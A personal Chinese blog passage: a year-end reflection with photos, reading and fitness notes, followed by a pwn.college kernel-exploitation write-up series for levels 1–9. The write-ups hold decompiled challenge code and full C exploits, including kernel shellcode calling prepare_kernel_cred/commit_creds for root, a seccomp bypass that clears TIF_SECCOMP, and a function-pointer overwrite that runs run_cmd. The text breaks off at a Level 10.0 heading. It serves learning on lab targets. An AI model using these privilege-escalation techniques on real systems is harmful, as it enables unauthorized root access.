所以今年下半年主要就是训练的一个「抗压能力」。我最希望能够支持我的人只会否定我，多年来我一直渴望能够解决一些根本的问题，但是都已失败而告终。说来也好笑，尝试了这么多年来都没有成功过，却还抱有幻想。我希望能够开放更多的情感，现实却予以我冷漠的回应……这点估计是改不掉的，但既然我有选择允许让什么伤害自己的能力，也就自然有选择拒绝哪些伤害的能力。可能有些事情现在确实做不到，那就不要有不切实际的期待了，努力去改变吧。也就是我，吃了那么多蜇还不长一智……鉴定为，笨猪（

一味的善良并没有任何实质性的作用，必须优先考虑「自身利益」。守住初心，记住你为什么而做这些、为什么而活，就不会迷失。

真是应了那句屠龙者终成恶龙。有时候会想，从某方面来说，感觉还是活成了自己所不喜欢的样子？或许只是因为目前的能力还不够支撑起自己的理想主义吧。但还是希望我能永远坚守理想，有关我的信仰、我的追求、所向往的一切等等……希望我可以永远守护好那颗「少年的心」。

老实说，我觉得自己的热血，以及激情其实都不如从前高昂。一方面可能是深入后，要学的东西越来越难了，一个概念可能都要琢磨好几天，又没人帮，天天给自己找虐，很难有持续的激情，变懒也是再正常不过的了；另一方面，我感觉经过一个暑假的高强度不间断猛烈精神打击，我对自己的要求多少没以前那么高了，就算最后只能做一个普通人，那也没啥大不了的。接受自己的平庸，也是人生中的一堂必修课。而我，很高兴能提早上到这堂课。

历经千帆才知平凡，碌碌无为那叫平庸。<br />

「一切不能杀死我的，都将使我更加强大。」我当然是向前的，但有的时候也会瞎想，能力越来越强后，能打击到自己的困难也会越来越……令人难以接受？不知道怎么形容，但应该是超越过往任何一段黑暗时光的存在？我不知道，不过这个想法可能是错误的吧。but who care ?

有关学 Pwn 的坎坷之路，还有点别的小故事，不想写了……说多了都是泪（

若是美好，叫做精彩，若是糟糕，叫做经历。

所以我今年最伟大的成就就是，活着；做出最庆幸的选择就是，坚持。

生活切面｜慢下来的一部分

曾经在幽幽暗暗反反复复中追问，才知道平平淡淡从从容容才是真。

或许是我太懒了，也可能是我的 memos 太多了，加上最近好像实在么的什么心情写年终总结……

~~有个 memos 就是好，想记的当场就记下了，直接把回忆 archive（bushi~~

这块儿我就随便放点我认为今年拍的还不错的照片好了，当然，实际上可能并不怎么样就是了/颓废

这辈子收到的第一份礼物

Vlex 承包我这辈子收到的所有礼物 >_<

这好像是我人生中第一次收到礼物吧哈哈哈，带着美好的祝福开启了 25 年的征程。

朵云书院

去年就想去了，但是今年才去成。看了下这号称是上海最高的图书馆，感觉也就那样，纯打卡景点，没啥东西。

人生中第一次吃自助（

这辈子第一次吃自助也是在今年……毁了，怎么感觉我的生活那么无聊……

文化自由

雀舌是真的好喝 :P

龙华寺

25 年的第一次追日落是从逛龙华寺开始的，虽然那天根本就没看成日落……

上师大瞎逛

来了就把周边都逛逛，一个也别想跑 xD

~~你不许问我为什么偷拍人家结婚照（~~

想看的，一个都不许落下

看日落是去年就立下的 flag 了，但是你可知我今年看了几场日落（

龙华是第一次，但是那次没拍到理想的日落，于是接下来连续几周我每周都去一次滨江大道，而这，是第五次 LMAO

至于今年到底看了几回日落，仅仅是五次吗？我觉得可能不止……

感觉自己是个大笨蛋，不过是看个日落罢了……

因为手机拍不清对岸的风景，然后一顿瞎折腾，意外发现不对焦拍出来的模糊效果也很好看 LOL

顺便还把北极星拍进去了，这算是我今年最满意的照片之一了。

暮春

回忆回忆……嗯，是在世纪公园拍的。今年也去了好几次世纪公园，不过初看感觉很大，实际上体验并不佳。

樱花节

顾村公园是真的大，逛了整整一天都没逛完，明年再去。

故鄉

儿时恶搞的痕迹，还在呢 LOL

家有花农

？？

一次干掉一整瓶红酒（

这东西还是冰的好喝，不冰的干红酒入口味道有点大……

what

公园漫步

想走就走，我也不知道是什么地方，反正就是瞎逛 xD

那棵树下的长椅很有感觉啊，好像恐怖片里的场景（bushi

书店

今年也逛了几次书店，主要买点定制书，收藏价值拉满 :P

随手翻开两本书的扉页，意外地给人一种连贯感……

追光

也是吃完饭闲的没事，去探索地图无意中发现的风景 LOL

生日 Party

渊渊的生日派对包得翘课去嗨皮的呀～

Unknown

千万让我这个闲人吃饱饭发现河里有乌龟，不然我会用雨伞把它捞上来再放到更大的河里……

大气层摄影师

好像自那天以后天边的晚霞都很好看。

湖州记

去了趟湖州，结果回来发现被晒成煤炭了（

1024

时间来到了 10.24，去 GeekCon 2025 当志愿者玩了。23 和工作人员布置场地到晚上九点，24 早上五点就起床去赶地铁了，结果发现地铁六点半才开始运营 lol

N1nEmAn 师傅也去了，又和老熟人碰了个头，年底的时候 vlex 也从英国回来了，去年面基过的人今年都再次见面了 xD

1023 晚和 GeekCon 的工作人员一起吃晚饭，发现这些研究所的大佬都好强，一个个都是全栈爷，但都没什么架子。要是以后有机会的话倒是挺想去 GeekCon 实习的哈哈。希望以后我能和台上台下的大佬们更进一步。

天安千树

20 年前的人对未来城市的想象（

红园

在刚入冬的时候去的，当时想着不能错过今年份的秋，就算是残秋我也要看……夏天的时候就暗自想着这辈子能看多少春夏秋冬了，要珍惜（

遗憾的是上海的冬天没有雪。

GDPS

GDPS 是今年参加的最后一个大型活动了，那天，我看机器人看到吐（

领导参观，大场面……

这辈子头一回见那么大的硬盘，西数的服务器也很帅。

一开始以为是什么赛博机器人，心想怎么弄那么逼真，然后问负责这个场地的，让我上前看看就知道了 embarrassment..

外骨骼……这可是真的穿上叠 buff 啊，太强了！

未来黑奴的广告词，俗，但直指核心 LMAO

没想到 GDPS 还有隐藏的活动，一开始看到硅基伴侣，以为咱现在那么开放了，都可以找机器人了吗？但最后发现，bro 好像是误入了相亲大会，想跑已经来不及了<s>（反正也没准备跑）</s>……

主要是有好玩的，桌上的小礼包还是很有吸引力的，包得厚着脸皮玩完再走啊哈哈哈，~~反正没见有查邀请函什么的（~~

一天下来薅了一堆没啥用的小礼品 xD

再次与 Vlex 相聚

终于来到了平安夜，本来是想着独自去人民广场啃个苹果，瞎逛逛的，但是 vlex 说要回国，俩人正好再见个面 :D

本来想在人民广场碰头，以为那边会很有圣诞氛围，然非也……不过那边的白鸽广场是真的名副其实，第一次见那么多鸽子聚在一起，发出低沉的咕咕声，有点小壮观。

下午直接逛 ZX 创趣场了，感觉自己的片历好少……不过也不需要那么丰富。

~~有关我和我的同性朋友去私人影院呆了一下午（~~

看的<i>《蓦然回首》</i>，很好的一部动漫，vlex 的赏析也很有深度，学习学习 :P

剩下一点时间也不够看别的了，无意间刷到了神奇的<i>《我的世界大电影》</i>，难绷……

当然少不了夜之城<s>（虽然快要看吐了，但每次去外滩都还是会随便拍几张）</s>

Vlex 送的圣诞礼物 :D 必须好好珍藏～

健身 | 对抗久坐与熵增

~~接下来来点 NSFW 的内容（~~

今年主要还是上半年健身多一点，并且难得的连续跑了好几周步，从五公里到十公里……有段时间有点想去跑个半马玩玩……

还记得当时扬言要一周解锁单手俯卧撑，结果还真给我做到了 xD

那会儿一次三个单手俯卧撑还是没什么问题的，但之后去学 Pwn 了就没怎么练过了……

希望明年我能更好的均衡健身和学习的时间。

阅读 | 被撑爆的小书架

列了一个小书单，应该已经超过 30+ 本书了，是目前这个小书架所承受不了的压力……

这是上半年的书架：

这是下半年的书架：

学校里还有一堆书没搬回来，估计到时候得堆地上了 :skull:

少有人走的路系列自从看了第一部，就深深爱上了。里面有些内容真的有救赎当时的我，然后就全部拿下了。不过这一整个系列带给我的更多的是一些理想化的东西，这个暑假的经历却让我更深切的感受到了，没有现实主义的支撑，理想主义最终只能成为空想主义。

这两本哲学史也是在 vlex 的推荐下去读的，本以为历史是枯燥乏味的，但是这两本书其实还挺有趣。

今年先对不同的哲学思想都做一个浅浅的了解，明年去研读一下存在主义相关的书籍。

此外，希望我以后能再多了解一点历史和政治方面的内容。

And.. I wanna a bigger bookshelf :(

写作 | 写什么不是写

闲得没事，随便申请了一下十年之约，然后直接通过了 xD

这就是博主的浪漫吗哈哈哈，希望我的博客一辈子不关闭。

看了下今年居然发了 37 篇博客，太高产了（

观影 | 枯燥生活的调味剂

每天都学各种各样的东西真的会身心疲惫，又不想打游戏，然后就尝试去看一些经典电影什么的，还是挺有意思的。不过很多电影看完后劲都有点小大，基本上一天的心情就被一部电影带过去了（

另外，也是在 vlex 的建议下，我入坑了动漫世界 LOL

一开始我对动漫的印象只有中二青年看的那些热血漫，那是真没兴趣，不过 vlex 说很多动漫也是很有深度的，都有着它的哲学思想在里面，在他的推荐下我从<i>《漂流少年》</i>开始入门，神作啊，从此爱上动漫哈哈哈。

后来闲得没事给自己建了一个片单，维护我的追番列表 :D

杂项 | 奇奇怪怪的年报们

Discord

深夜男娘陪聊是什么？我怎么不知道？毁了兄弟，被 discord 毁了……

Bilibili

用的比去年少了，bro 正在脱离互联网（bushi

Spotify

好像比去年的年报好看很多？

Hypixel

终于拿下 Legendary Fisher 的头衔，这下真可以养老了（

话说去年总游戏时长还有 12d，今年直接缩了一半吗？I love fishing!

每年的最后一刻一定是在 Hypixel 看 hanabi <3

Write-ups: System Security (Kernel Security) series (Completed)

Fri, 19 Dec 2025 00:00:00 GMT

import GithubCard from "@components/misc/GithubCard.astro";

你终于踏入了 Ring 0，那不是权力的开始，而是谦卑的第一步。

前言

本来预计 12.1 看完 kernel 的几个讲义，2 号直接开始做题，然后我也不知道我在干什么，讲义看了十几天才看完，一直到 19 号才开始做第一题……

期间花了几天时间写了一个全平台通用的自动化创建 kernel exploitation lab 环境的脚本，~~请务必 star 一下（~~

之后又因为每次一个 exp 脚本都要写很长很长，而且很多功能重复，就写了一个专用于打 kernel 的 C 版本 pwntools:

Level 1.0

Information

Category: Pwn

Description

Ease into kernel exploitation with this simple crackme level!

Write-up

经典的 LKM 结构，加载的时候调用 init_module，移除的时候调用 cleanup_module，init_module 里面打开了 /flag 并写入内核空间的 buffer，然后通过 proc_create 创建了 /proc/pwncollege，提供了 device_open，device_write，device_read，device_release，我们发现 device_write 里面实现了如下状态机：

ssize_t __fastcall device_write(file *file, const char *buffer, size_t length, loff_t *offset)
{
  size_t n16; // rdx
  char password[16]; // [rsp+0h] [rbp-28h] BYREF
  unsigned __int64 v8; // [rsp+10h] [rbp-18h]

  v8 = __readgsqword(0x28u);
  printk(&unk_810);
  n16 = 16;
  if ( length <= 0x10 )
    n16 = length;
  copy_from_user(password, buffer, n16);
  device_state[0] = (strncmp(password, "ucihjkpyaybhjjsf", 0x10u) == 0) + 1;
  return length;
}

如果我们写入密码 ucihjkpyaybhjjsf，device_write 就会将 device_state[0] 设置为 2，继续看 device_read 函数：

ssize_t __fastcall device_read(file *file, char *buffer, size_t length, loff_t *offset)
{
  const char *flag; // rsi
  size_t length_1; // rdx
  unsigned __int64 v8; // kr08_8

  printk(&unk_850);
  flag = flag;
  if ( device_state[0] != 2 )
  {
    flag = "device error: unknown state\n";
    if ( device_state[0] <= 2 )
    {
      flag = "password:\n";
      if ( device_state[0] )
      {
        flag = "device error: unknown state\n";
        if ( device_state[0] == 1 )
        {
          device_state[0] = 0;
          flag = "invalid password\n";
        }
      }
    }
  }
  length_1 = length;
  v8 = strlen(flag) + 1;
  if ( v8 - 1 <= length )
    length_1 = v8 - 1;
  return v8 - 1 - copy_to_user(buffer, flag, length_1);
}

如果 device_state[0] == 2 就将内核中的 flag 写入到用户态的 buffer 中。

最后庆祝一下人生中第一道 kernel（

Exploit

#include <fcntl.h>
#include <string.h>
#include <unistd.h>

#define FLAG_LENGTH 0x100

char password[] = "ucihjkpyaybhjjsf";
char flag[FLAG_LENGTH];

int main(int argc, char *argv[]) {
  int fd = open("/proc/pwncollege", O_RDWR);

  write(fd, password, strlen(password));
  read(fd, flag, FLAG_LENGTH);
  write(STDOUT_FILENO, flag, FLAG_LENGTH);

  return 0;
}

Level 2.0

Information

Category: Pwn

Description

Ease into kernel exploitation with another crackme level.

Write-up

输密码，密码对了就成了。

Exploit

#include <fcntl.h>
#include <string.h>
#include <unistd.h>

char password[] = "zcexibhdcclcottw";

int main(int argc, char *argv[]) {
  int fd = open("/proc/pwncollege", O_WRONLY);

  write(fd, password, strlen(password));

  return 0;
}

Level 3.0

Information

Category: Pwn

Description

Ease into kernel exploitation with another crackme level, this time with some privilege escalation (whoami?).

Write-up

白给的提权函数，提权后再 cat /flag 就好了。

Exploit

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char password[] = "tzrfzpifnzshksnp";

int main(int argc, char *argv[]) {
  int fd = open("/proc/pwncollege", O_WRONLY);

  printf("Current UID: %d\n", getuid());
  write(fd, password, strlen(password));
  printf("Current UID: %d\n", getuid());
  system("cat /flag");

  return 0;
}

Level 4.0

Information

Category: Pwn

Description

Ease into kernel exploitation with another crackme level and learn how kernel devices communicate.

Write-up

这次提供的是 device_ioctl，即我们需要通过 ioctl 函数来操作设备。

__int64 __fastcall device_ioctl(file *file, unsigned int cmd, unsigned __int64 arg)
{
  __int64 result; // rax
  int v5; // r8d
  char password[16]; // [rsp+0h] [rbp-28h] BYREF
  unsigned __int64 v7; // [rsp+10h] [rbp-18h]

  v7 = __readgsqword(0x28u);
  printk(&unk_328, file, cmd, arg);
  result = -1;
  if ( cmd == 1337 )
  {
    copy_from_user(password, arg, 16);
    v5 = strncmp(password, "qyikgpxrxvcinxbe", 0x10u);
    result = 0;
    if ( !v5 )
    {
      win();
      return 0;
    }
  }
  return result;
}

Exploit

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <unistd.h>

#define REQUEST 1337

char password[] = "qyikgpxrxvcinxbe";

int main(int argc, char *argv[]) {
  int fd = open("/proc/pwncollege", O_WRONLY);

  printf("Current UID: %d\n", getuid());
  ioctl(fd, REQUEST, password);
  printf("Current UID: %d\n", getuid());
  system("cat /flag");

  return 0;
}

Level 5.0

Information

Category: Pwn

Description

Utilize your hacker skillset to communicate with a kernel device and get the flag.

Write-up

device_ioctl 把 arg 当函数执行了，由于没开 kASLR, 所以可以直接通过 lsmod 得到 module 的加载基地址，用它加上模块内函数地址作为 arg 传入即可。

__int64 __fastcall device_ioctl(file *file, unsigned int cmd, unsigned __int64 arg)
{
  __int64 result; // rax

  printk(&unk_928, file, cmd, arg);
  result = -1;
  if ( cmd == 1337 )
  {
    ((void (*)(void))arg)();
    return 0;
  }
  return result;
}

~ # lsmod
challenge 16384 0 - Live 0xffffffffc0000000 (O)

Exploit

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <unistd.h>

#define REQUEST 1337

int main(int argc, char *argv[]) {
  int fd = open("/proc/pwncollege", O_WRONLY);

  printf("Current UID: %d\n", getuid());
  ioctl(fd, REQUEST, 0xffffffffc0000000 + 0x8BD);
  printf("Current UID: %d\n", getuid());
  system("cat /flag");

  return 0;
}

Level 6.0

Information

Category: Pwn

Description

Utilize a 'buggy' kernel device and shellcode to escalate privileges to root and get the flag!

Write-up

读入 shellcode，然后执行。

ssize_t __fastcall device_write(file *file, const char *buffer, size_t length, loff_t *offset)
{
  size_t n4096; // rdx
  __int64 v6; // rbp

  printk(&unk_698, file, buffer, length, offset);
  n4096 = 4096;
  if ( length <= 0x1000 )
    n4096 = length;
  v6 = copy_from_user(shellcode, buffer, n4096);
  ((void (*)(void))shellcode)();
  return length - v6;
}

~ # cat /proc/kallsyms | grep "prepare_kernel_cred\|commit_creds"
ffffffff81089310 T commit_creds
ffffffff81089660 T prepare_kernel_cred

注意 call 指令需要指定返回到哪里，否则会跑飞。

Exploit

#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
  int fd = open("/proc/pwncollege", O_WRONLY);

  unsigned char sc[] =
      "\x48\x31\xff"                 // xor rdi, rdi
      "\x48\xc7\xc0\x60\x96\x08\x81" // mov rax, 0xffffffff81089660
      "\xff\xd0"                     // call rax (prepare_kernel_cred)
      "\x48\x89\xc7"                 // mov rdi, rax
      "\x48\xc7\xc0\x10\x93\x08\x81" // mov rax, 0xffffffff81089310
      "\xff\xd0"                     // call rax (commit_creds)
      "\xc3";                        // ret

  write(fd, sc, sizeof(sc));
  system("cat /flag");

  return 0;
}

使用我的 axium 后只要这样写：

#include <axium/axium.h>

int main(void) {
  int fd = open("/proc/pwncollege", O_WRONLY);

  payload_t escalate;
  payload_init(&escalate);
  ksc_escalate(&escalate, 0xffffffff81089660, 0xffffffff81089310);

  write(fd, escalate.data, escalate.size);
  system("cat /flag");

  payload_fini(&escalate);

  return 0;
}

Level 7.0

Information

Category: Pwn

Description

Utilize a 'buggy' kernel device and shellcode to escalate privileges to root and get the flag!

Write-up

这题用 ioctl，并且改了逻辑，需要按照特定内存 layout 来布置 shellcode 。

第一个 copy_from_user 将 arg 的前八字节当作 shellcode 长度写入 shellcode_length 变量，第二次将 arg + 0x1008 处的八字节写入 shellcode_execute_addr 中，然后第三次则是将 arg + 8 处的 shellcode 写入 shellcode 中，最后执行的是 shellcode_execute_addr[0]，即 arg 指定要读入的 shellcode 的长度，arg + 0x1008 指定要执行的 shellcode 地址，arg + 8 处一共 0x1000 字节空间用于写 shellcode 。

__int64 __fastcall device_ioctl(file *file, unsigned int cmd, unsigned __int64 arg)
{
  __int64 result; // rax
  size_t shellcode_length; // [rsp+0h] [rbp-28h] BYREF
  void (*shellcode_execute_addr[4])(void); // [rsp+8h] [rbp-20h] BYREF

  shellcode_execute_addr[1] = (void (*)(void))__readgsqword(0x28u);
  printk(&unk_11A0, file, cmd, arg);
  result = -1;
  if ( cmd == 1337 )
  {
    copy_from_user(&shellcode_length, arg, 8);
    copy_from_user((size_t *)shellcode_execute_addr, arg + 4104, 8);
    result = -2;
    if ( shellcode_length <= 0x1000 )
    {
      copy_from_user(shellcode, arg + 8, shellcode_length);
      shellcode_execute_addr[0]();
      return 0;
    }
  }
  return result;
}

Exploit

#include <assert.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>

#define PACKED __attribute__((packed))
#define NAKED __attribute__((naked))

#define DEVICE_PATH "/proc/pwncollege"
#define REQUEST 1337

typedef struct {
  uint64_t sc_size;
  uint8_t sc[0x1000];
  uint64_t sc_addr;
} PACKED payload_t;

NAKED void escalate(void) {
  __asm__ volatile(".intel_syntax noprefix;"
                   ".global escalate_start;"
                   ".global escalate_end;"
                   "escalate_start:;"
                   "xor rdi, rdi;"
                   "mov rax, 0xffffffff81089660;" // prepare_kernel_cred
                   "call rax;"
                   "mov rdi, rax;"
                   "mov rax, 0xffffffff81089310;" // commit_creds
                   "call rax;"
                   "ret;"
                   "escalate_end:;"
                   ".att_syntax;");
}

extern char escalate_start[];
extern char escalate_end[];

static inline size_t get_escalate_size(void) {
  return escalate_end - escalate_start;
}

static inline void construct_payload(payload_t *p, uint64_t exec_addr) {
  size_t size = get_escalate_size();

  p->sc_size = size;
  memcpy(p->sc, escalate_start, size);
  p->sc_addr = exec_addr;
}

int main(void) {
  int fd = open(DEVICE_PATH, O_WRONLY);
  assert(fd > 0);

  payload_t payload = {0};
  size_t escalate_size = escalate_end - escalate_start;

  construct_payload(&payload, 0xffffc90000085000ULL);

  assert(ioctl(fd, REQUEST, &payload) >= 0);
  close(fd);
  system("cat /flag");

  return 0;
}

Level 8.0

Information

Category: Pwn

Description

Utilize a userspace binary to interact with a kernel device.

Write-up

这个 challenge 给了两个文件，一个用户态的程序，一个内核 module，话不多说，直接逆。

下面是内核 module 主要逻辑，从用户态读入 shellcode 到内核态的 buf 然后执行：

ssize_t __fastcall device_write(file *file, const char *buffer, size_t length, loff_t *offset)
{
  size_t n4096; // rdx
  __int64 v6; // rbp

  printk(&unk_968, file, buffer, length, offset);
  n4096 = 4096;
  if ( length <= 0x1000 )
    n4096 = length;
  v6 = copy_from_user(shellcode, buffer, n4096);
  ((void (*)(void))shellcode)();
  return length - v6;
}

然后这个用户态程序逻辑如下：

int __fastcall main(int argc, const char **argv, const char **envp)
{
  int i; // [rsp+24h] [rbp-1Ch]
  int v5; // [rsp+28h] [rbp-18h]
  int v6; // [rsp+2Ch] [rbp-14h]
  __int64 v7; // [rsp+38h] [rbp-8h]

  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  puts("###");
  printf("### Welcome to %s!\n", *argv);
  puts("###");
  putchar(10);
  puts("You may upload custom shellcode to do whatever you want.\n");
  puts("For extra security, this challenge will only allow certain system calls!\n");
  v5 = open("/proc/pwncollege", 2);
  printf("Opened `/proc/pwncollege` on fd %d.\n", v5);
  puts(&s_);
  if ( mmap((void *)0x31337000, 0x1000u, 7, 34, 0, 0) != (void *)825454592 )
    __assert_fail("shellcode == (void *)0x31337000", "<stdin>", 0x63u, "main");
  printf("Mapped 0x1000 bytes for shellcode at %p!\n", (const void *)0x31337000);
  puts("Reading 0x1000 bytes of shellcode from stdin.\n");
  v6 = read(0, (void *)0x31337000, 0x1000u);
  puts("This challenge is about to execute the following shellcode:\n");
  print_disassembly(825454592, v6);
  puts(&s_);
  puts("Restricting system calls (default: allow).\n");
  v7 = seccomp_init(2147418112);
  for ( i = 0; i <= 511; ++i )
  {
    if ( i == 1 )
    {
      printf("Allowing syscall: %s (number %i).\n", "write", 1);
    }
    else if ( (unsigned int)seccomp_rule_add(v7, 0, (unsigned int)i, 0) )
    {
      __assert_fail("seccomp_rule_add(ctx, SCMP_ACT_KILL, i, 0) == 0", "<stdin>", 0x79u, "main");
    }
  }
  puts("Executing shellcode!\n");
  if ( (unsigned int)seccomp_load(v7) )
    __assert_fail("seccomp_load(ctx) == 0", "<stdin>", 0x7Eu, "main");
  MEMORY[0x31337000]();
  puts("### Goodbye!");
  return 0;
}

可以看到这个程序已经为我们打开了内核 module 创建的设备文件，然后 mmap 了一块 rwx 内存，之后从 stdin 向 mmap 出来的内存读入数据，然后通过 seccomp 白名单只放行了 write 调用，然后执行 mmap 出来的地址。

问题就在于我们写入的 shellcode 既会在内核态执行，又会在用户态执行。虽然用户态只能调用 write，但我们可以先在内核态将当前进程的 seccomp 手动关闭，然后返回到用户态执行后续操作就不受限制了。

先读一下内核源码，看看这个 seccomp 机制是怎么运作的。

众所周知，内核中每个进程都有一个 task_struct 结构体，这个结构体中又有一个 thread_info 结构体，保存当前 thread 的信息：

struct thread_info {
  unsigned long  flags;   /* low level flags */
  u32            status;  /* thread synchronous flags */
};

thread_info 的 flags 字段有如下这些可用 flags，其中有一个叫做 TIF_SECCOMP 的东西引起了我们的注意（

#define TIF_SYSCALL_TRACE 0 /* syscall trace active */
#define TIF_NOTIFY_RESUME 1 /* callback before returning to user */
#define TIF_SIGPENDING  2 /* signal pending */
#define TIF_NEED_RESCHED 3 /* rescheduling necessary */
#define TIF_SINGLESTEP  4 /* reenable singlestep on user return*/
#define TIF_SSBD  5 /* Speculative store bypass disable */
#define TIF_SYSCALL_EMU  6 /* syscall emulation active */
#define TIF_SYSCALL_AUDIT 7 /* syscall auditing active */
#define TIF_SECCOMP  8 /* secure computing */
#define TIF_SPEC_IB  9 /* Indirect branch speculation mitigation */
#define TIF_SPEC_FORCE_UPDATE 10 /* Force speculation MSR update in context switch */
#define TIF_USER_RETURN_NOTIFY 11 /* notify kernel of userspace return */
#define TIF_UPROBE  12 /* breakpointed or singlestepping */
#define TIF_PATCH_PENDING 13 /* pending live patching update */
#define TIF_NEED_FPU_LOAD 14 /* load FPU on return to userspace */
#define TIF_NOCPUID  15 /* CPUID is not accessible in userland */
#define TIF_NOTSC  16 /* TSC is not accessible in userland */
#define TIF_IA32  17 /* IA32 compatibility process */
#define TIF_NOHZ  19 /* in adaptive nohz mode */
#define TIF_MEMDIE  20 /* is terminating due to OOM killer */
#define TIF_POLLING_NRFLAG 21 /* idle is polling for TIF_NEED_RESCHED */
#define TIF_IO_BITMAP  22 /* uses I/O bitmap */
#define TIF_FORCED_TF  24 /* true if TF in eflags artificially */
#define TIF_BLOCKSTEP  25 /* set when we want DEBUGCTLMSR_BTF */
#define TIF_LAZY_MMU_UPDATES 27 /* task is updating the mmu lazily */
#define TIF_SYSCALL_TRACEPOINT 28 /* syscall tracepoint instrumentation */
#define TIF_ADDR32  29 /* 32-bit address space on 64 bits */
#define TIF_X32   30 /* 32-bit native x86-64 binary */
#define TIF_FSCHECK  31 /* Check FS is USER_DS on return */

查看引用，得到如下代码：

#ifdef CONFIG_HAVE_ARCH_SECCOMP_FILTER
extern int __secure_computing(const struct seccomp_data *sd);
static inline int secure_computing(const struct seccomp_data *sd)
{
  if (unlikely(test_thread_flag(TIF_SECCOMP)))
    return  __secure_computing(sd);
  return 0;
}
#else
extern void secure_computing_strict(int this_syscall);
#endif

很显然，如果设置了 TIF_SECCOMP 位那就执行 __secure_computing 对进行的系统调用进行检查，否则啥也不干。

所以我们只要通过 current_task_struct->thread_info.flags &= ~(1 << TIF_SECCOMP) 手动清除这个 flag 位就能关闭 seccomp，是不是很帅？

非常幸运的是，current_task_struct 位于 per-cpu 数据区，而 gs_base 指向的就是这个数据区的基地址。我们可以通过 p &current_task 得到这个结构体在 per-cpu 数据区内的偏移：

pwndbg> p &current_task
$1 = (struct task_struct **) 0x15d00 <current_task>
pwndbg> ptype /o struct task_struct
/* offset      |    size */  type = struct task_struct {
/*      0      |      16 */    struct thread_info {
/*      0      |       8 */        unsigned long flags;
/*      8      |       4 */        u32 status;
/* XXX  4-byte padding   */
[...]
pwndbg> ptype /o struct thread_info
/* offset      |    size */  type = struct thread_info {
/*      0      |       8 */    unsigned long flags;
/*      8      |       4 */    u32 status;
/* XXX  4-byte padding   */

                               /* total size (bytes):   16 */
                             }

Exploit

#include <unistd.h>

#define PACKED __attribute__((packed))
#define NAKED __attribute__((naked))

#define STR(x) #x
#define XSTR(x) STR(x)

#define TIF_SECCOMP 8

NAKED void shellcode(void) {
  __asm__ volatile(
      ".intel_syntax noprefix;"
      ".global sc_start;"
      ".global sc_end;"
      "sc_start:;"
      "mov rdi, 0x3;"
      "lea rsi, [rip + break_seccomp_start];"
      "mov rdx, break_seccomp_end - break_seccomp_start;"
      "mov rax, 0x1;"
      "syscall;" // write(0x3, break_seccomp_start, sizeof(break_seccomp))
      "lea rdi, [rip + flag];"
      "xor rsi, rsi;"
      "mov rax, 0x2;"
      "syscall;" // open("/flag", 0)
      "mov rdi, 0x1;"
      "mov rsi, rax;"
      "xor rdx, rdx;"
      "mov r10, 0x1337;"
      "mov rax, 0x28;"
      "syscall;" // sendfile(0x1, flag_fd, 0, 0x1337)
      "break_seccomp_start:;"
      "mov rax, QWORD PTR gs:0x15d00;"
      "and QWORD PTR [rax], ~(1 << " XSTR(TIF_SECCOMP) ");"
      "ret;"
      "break_seccomp_end:;"
      "flag: .ascii \"/flag\";"
      "sc_end:;"
      ".att_syntax;");
}

extern char sc_start[];
extern char sc_end[];

int main(void) {
  size_t sc_size = sc_end - sc_start;

  write(STDOUT_FILENO, sc_start, sc_size);

  return 0;
}

Level 9.0

Information

Category: Pwn

Description

Exploit a buggy kernel device to get the flag!

Write-up

ssize_t __fastcall device_write(file *file, const char *buffer, size_t length, loff_t *offset)
{
  __int64 n66; // rcx
  $03BF2B29B6BBB97215B935736F34BBB0 *p_logger; // rdi
  __int64 v7; // rbp
  $03BF2B29B6BBB97215B935736F34BBB0 logger; // [rsp+0h] [rbp-120h] BYREF
  unsigned __int64 v10; // [rsp+108h] [rbp-18h]

  n66 = 66;
  v10 = __readgsqword(0x28u);
  p_logger = &logger;
  while ( n66 )
  {
    *(_DWORD *)p_logger->buffer = 0;
    p_logger = ($03BF2B29B6BBB97215B935736F34BBB0 *)((char *)p_logger + 4);
    --n66;
  }
  printk(&unk_C70);
  logger.log_function = (int (*)(const char *, ...))&printk;
  if ( length > 0x108 )
  {
    _warn_printk("Buffer overflow detected (%d < %lu)!\n", 264, length);
    BUG();
  }
  v7 = copy_from_user(&logger, buffer, length);
  logger.log_function((const char *)&logger);
  return length - v7;
}

00000000 struct $03BF2B29B6BBB97215B935736F34BBB0 // sizeof=0x108
00000000 {                                       // XREF: device_write/r
00000000     char buffer[256];
00000100     int (*log_function)(const char *, ...); // XREF: device_write+4A/w
00000100                                         // device_write:loc_BE1/r
00000108 };

可以看到，整个程序的逻辑也是非常的简单呢，定义了一个结构体，里面有两个字段，分别是 256 字节的 buffer 和一个函数指针。用户可以写入数据覆盖这个结构体，然后程序会将 buffer 当作 rdi，调用结构体中定义的函数指针。

这里选择的是 run_cmd 这个 kernel ABI 里面提供的调用：

static int run_cmd(const char *cmd)
{
  char **argv;
  static char *envp[] = {
    "HOME=/",
    "PATH=/sbin:/bin:/usr/sbin:/usr/bin",
    NULL
  };
  int ret;
  argv = argv_split(GFP_KERNEL, cmd, NULL);
  if (argv) {
    ret = call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
    argv_free(argv);
  } else {
    ret = -ENOMEM;
  }

  return ret;
}

注意 run_cmd 中要执行的指令需要使用绝对路径，不然可能会失败。另，指令最好不依赖 tty, stdin / stdout / stderr 这些 I/O，否则会失败。

Exploit

#include <assert.h>
#include <fcntl.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>

#define PACKED __attribute__((packed))
#define NAKED __attribute__((naked))

#define STR(x) #x
#define XSTR(x) STR(x)

#define DEVICE "/proc/pwncollege"

typedef struct {
  char buf[256];
  uint64_t func;
} PACKED payload_t;

int main(void) {
  int fd = open(DEVICE, O_WRONLY);
  assert(fd > 0);

  payload_t payload = {0};
  char *cmd = "/run/dojo/bin/chown 1000:1000 /flag";

  memcpy(payload.buf, cmd, strlen(cmd));
  payload.func = 0xffffffff81089b30ULL;

  write(fd, &payload, sizeof(payload_t));

  return 0;
}

Level 10.0

Information

Category: Pwn

Description

Exploit a buggy kernel device with KASLR enabled to get the flag!

Write-up

